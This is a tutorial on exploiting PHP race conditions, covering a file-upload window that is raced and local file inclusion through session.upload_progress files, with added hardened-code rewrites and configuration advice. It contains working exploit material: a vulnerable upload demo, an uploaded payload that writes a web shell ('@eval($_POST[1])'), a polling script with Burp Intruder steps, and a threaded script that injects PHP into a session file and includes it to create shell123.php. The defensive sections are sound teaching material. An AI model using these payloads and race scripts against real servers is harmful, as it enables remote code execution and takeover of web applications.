Test demo:
<html>
<body>
<form action="" method="post" enctype="multipart/form-data">
  <label for="file">Filename:</label>
  <input type="file" name="file"/>
  <input type="submit" name="submit" value="Submit" />
</form>
</body>
</html>
<?php
if (!empty($_FILES)) {
    // Race window: between move_uploaded_file() and unlink() the upload sits
    // in the web root under its client-supplied name and can be requested.
    move_uploaded_file($_FILES['file']['tmp_name'], $_FILES['file']['name']);
    unlink($_FILES['file']['name']);
}
?>
Contents of the uploaded shell file:
<?php
echo md5(1);   // marker the polling script below looks for in the response
fputs(fopen('shell6666.php', 'w'), '<?php @eval($_POST[1])?>');
?>
Python script that keeps requesting the uploaded file until it is hit inside the race window:
# coding:utf-8
import requests


def main():
    # Poll the uploaded file; it only exists between move_uploaded_file() and unlink().
    i = 0
    while True:
        try:
            print(i, end='\r')
            a = requests.get("http://aaa.io/sssss.php")
            if "c4ca4238a0b923820dcc509a6f75849b" in a.text:
                print("OK")
                break
        except Exception:
            pass
        i += 1


if __name__ == '__main__':
    main()
Here c4ca4238a0b923820dcc509a6f75849b is md5(1), the marker the uploaded file prints.
Burp setup: send the upload request to the Intruder module.
Then run the Python script and start the Burp Intruder attack; the order does not matter, and the race is usually won within a few rounds.
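The root cause in the "Test demo" above is that the file is moved into the web root under the client's name before any decision is made, and only removed afterwards. The following is an added example, not code from the original post: a rewrite of that handler in which every check runs against PHP's temporary file, the stored name is chosen by the server, and rejected uploads are never moved at all, so there is no window to race. The directory $storeDir, the extension allowlist and the form field name "file" are assumptions for the example.

```php
<?php
// Added example (not from the original post): hardened upload handler.
// Assumptions: $storeDir is outside the document root and not served by the
// web server; only the listed extensions are accepted.
declare(strict_types=1);

$storeDir   = __DIR__ . '/../uploads_private';            // assumed private dir
$allowedExt = ['txt' => 'text/plain', 'png' => 'image/png', 'jpg' => 'image/jpeg'];

function acceptUpload(array $file, string $storeDir, array $allowedExt): ?string
{
    // 1. Transport-level sanity: PHP reported success and the path really is an upload.
    if (!isset($file['error']) || $file['error'] !== UPLOAD_ERR_OK) {
        return null;
    }
    if (!is_uploaded_file($file['tmp_name']) || !is_dir($storeDir)) {
        return null;
    }

    // 2. All content decisions happen on the temp file, before anything is moved.
    $ext = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
    if (!isset($allowedExt[$ext])) {
        return null;
    }
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    if ($finfo->file($file['tmp_name']) !== $allowedExt[$ext]) {
        return null;
    }

    // 3. Server-chosen name: the client's filename never reaches the filesystem,
    //    and the destination is not web-accessible, so nothing is ever "briefly live".
    $target = $storeDir . '/' . bin2hex(random_bytes(16)) . '.' . $ext;
    if (!move_uploaded_file($file['tmp_name'], $target)) {
        return null;
    }
    chmod($target, 0640);
    return $target;
}

if (!empty($_FILES['file'])) {
    $saved = acceptUpload($_FILES['file'], $storeDir, $allowedExt);
    echo $saved === null ? 'rejected' : 'stored';
}
```

The order of operations is the whole point: the original "move, then unlink if unwanted" pattern is a time-of-check/time-of-use bug, while "check, then move only if wanted" has no state an attacker can observe in between.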
Another case: racing against session files
demo:
<?php
if (isset($_GET['file'])) {
    include './' . $_GET['file'];
}
In this case we cannot upload a file, so how is it exploited? By including the session file.
We know session_start() is the function that opens session handling; what if the application never calls it?
PHP has the session.upload_progress feature, which records file-upload progress in the session, and it is enabled by default.
That is, when our POST request contains a PHP_SESSION_UPLOAD_PROGRESS field, the session is initialised even though session_start() is never called. By default, however, the progress data is cleared as soon as the upload finishes, so we have to exploit the race condition.
Proof-of-concept demo: 1.php
<html>
<body>
<form action="" method="post" enctype="multipart/form-data">
  <label for="file">Filename:</label>
  <input type="text" name="PHP_SESSION_UPLOAD_PROGRESS" value="888"/>
  <input type="file" name="file"/>
  <input type="submit" name="submit" value="Submit" />
</form>
</body>
</html>
<?php ?>
Note: the <input type="text" name="PHP_SESSION_UPLOAD_PROGRESS" value="888" /> field must come before the <input type="file" name="file" /> field in the multipart body; otherwise the session file name cannot be controlled.
Exploit script:
import io
import threading

import requests

sessid = 'ph1'


def t1(session):
    # Keep posting uploads so that a session file containing our progress data exists.
    while True:
        f = io.BytesIO(b'a' * 1024 * 50)
        session.post(
            'http://localhost/2.php',
            data={'PHP_SESSION_UPLOAD_PROGRESS': '<?=file_put_contents("shell123.php","<?=phpinfo();?>")?>'},
            files={'file': ('a.txt', f)},
            cookies={'PHPSESSID': sessid},
        )


def t2(session):
    # Keep including the session file before the upload finishes and it is cleaned up.
    while True:
        response = session.get(f'http://localhost/2.php?file=../Extensions/tmp/tmp/sess_{sessid}')
        print(response.text)


with requests.session() as session:
    uploader = threading.Thread(target=t1, args=(session,))
    uploader.daemon = True
    uploader.start()
    t2(session)
Adjust the target URL and the session file path to match your environment. After a successful race, shell123.php is created.
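Two things make the session race above work: the include path is built from request data, and session.upload_progress writes attacker-controlled bytes into a file whose name (sess_ plus the PHPSESSID cookie) the client chooses. The following is an added example, not code from the original post, showing the defensive rewrite of the include demo: pages are selected by a fixed key, and the resolved path is additionally confined to a known directory. The ./pages directory and the "page" parameter are assumptions for the example. Disabling the feature itself is a one-line php.ini change, session.upload_progress.enabled = Off; if the application does use it, keep session.upload_progress.cleanup = On (the default), keep session.save_path outside any includable directory, and treat a multipart request carrying a PHP_SESSION_UPLOAD_PROGRESS field to an application that never uses upload progress as a detection signal.

```php
<?php
// Added example (not from the original post): include by allowlisted key,
// never by request-supplied path. Assumption: page files live in ./pages.
declare(strict_types=1);

$pages = [
    'home'  => __DIR__ . '/pages/home.php',
    'about' => __DIR__ . '/pages/about.php',
];

function resolvePage(array $pages, ?string $key): ?string
{
    // 1. The request only ever selects a key; it never contributes path characters.
    if ($key === null || !array_key_exists($key, $pages)) {
        return null;
    }
    // 2. Belt and braces: even the mapped file must resolve under ./pages,
    //    so a later misconfiguration of $pages cannot re-open traversal.
    $path = realpath($pages[$key]);
    $base = realpath(__DIR__ . '/pages');
    if ($path === false || $base === false
        || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;
}

$page = resolvePage($pages, $_GET['page'] ?? null);
if ($page === null) {
    http_response_code(404);
    exit;
}
include $page;
```

With the include closed, a session file that happens to contain PHP tags is just data on disk; the upload_progress race still writes it, but nothing ever executes it.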